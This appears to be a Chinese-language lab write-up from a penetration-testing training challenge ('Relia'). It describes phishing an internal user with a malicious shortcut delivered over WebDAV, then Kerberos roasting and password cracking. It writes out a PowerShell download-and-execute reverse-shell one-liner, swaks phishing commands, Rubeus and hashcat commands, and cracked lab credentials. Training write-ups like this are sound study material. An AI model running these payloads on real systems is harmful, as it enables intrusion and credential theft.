Challenge 2 - Relia(6)
Challenge 2 - Relia(6)
下一台目標室內網的 .14 機器,不過攻擊的契機是上一章拿到的郵件帳號與密碼
所以攻擊的方式是透過外網的 .189 寄信給 jim@relia.com
之前有掃過外網的 .189 Rustscan 如下,可以看到有開啟 25 Port
snmp 是沒有開的
可以看到 25 Port 是 hMailServer smtpd
先建立一個 Shortcut 內容為 Reverse Shell,powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.201/tools/powercat.ps1');powercat -c 192.168.45.201 -p 4444 -e powershell"
同 LAB 練習,參考 : https://your-it-note.blogspot.com/2023/08/windows-library-file.html
一樣取名 "automatic_configuration"
測試看來沒有問題,短連結是透過 LAB2 準備的 WINPREP 機器建立
寄件者號密碼 maildmz@relia.com:DPuBT9tGCBrTbR,確認有效的驗證
直接將短連結 Shortcut 寄給 jim@relia.com 看看,sudo swaks -t jim@relia.com --from maildmz@relia.com --attach @automatic_configuration.lnk --server 192.168.155.189 --body @/home/kali/lab2/14/body.txt --header "Subject: automatic_configuration Script" --suppress-data -ap
等了一段時間都沒有 Reverse Shell 進來,看來不能直接寄短連結
那就一樣先建立 WebDAV Server ,/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
將短連結放在 WebDAV 伺服器目錄
裡面記得要再放 /tools/powercat.ps1
建立 WebDAV 連線檔案
再寄一次,sudo swaks -t jim@relia.com --from maildmz@relia.com --attach @aries.Library-ms --server 192.168.155.189 --body @/home/kali/lab2/14/body.txt --header "Subject: automatic_configuration Script" --suppress-data -ap
可以看到來連線也有抓 powercat.ps1
4444 Listener 進來了,whoami 確認是 jim,IP 是內網的 172.16.xxx.14,順手拿 local.txt flag
systeminfo 可以看到這一台有加入 (relia.com) 網域
net user /domain 將網域帳號列舉出來
Get-LocalGroupMember administrators,現有使用者不是管理者但有看到 offsec 是管理者
whoami /priv 沒有啥可利用的權限
執行 .\Rubeus.exe asreproast /nowrap 查找 AS-REP,發現 michelle 帳號
hashcat 破解看看,└─$ hashcat -m 18200 michelle.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force,破解得到密碼 "NotMyPassword0k?"
馬上測試看看,└─$ crackmapexec smb 192.168.155.189 -u michelle -p 'NotMyPassword0k?'
改查詢 Kerberoasting,.\rubeus.exe kerberoast /outfile:hashes.kerberoast
發現 iis_service 帳號的 HASH
破解看看,└─$ hashcat -m 13100 iis_service.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force,破解不了
更新攻擊順序表如下
繼續枚舉發現 jim 的資料夾中有一個 *.kdbx,透過 chisel 將檔案抓回來
破解密碼得到 "mercedes1"
獲得兩組帳號密碼 dmzadmin:SlimGodhoodMope、jim@relia.com:Castello1!
dmzadmin:SlimGodhoodMope 測試後是外網 .191 的本機帳號驗證
驗證網域帳號 jim 的密碼,確認現有帳號密碼驗證是 jim@relia.com:Castello1!
更新帳號密碼表
後續跑了 winPEASx64.exe 以及繼續枚舉逛機器都沒有發現額外有用的資訊
也沒有提權成功,但至此終於打入內網且拿到了一組有用的資訊網域資訊
一樣有跑了 BloodHound 不過暫時沒有甚麼用所以先不寫
將網域這一段 BloodHound 放到下個章節來講,原因看到下一章就知道了
留言
張貼留言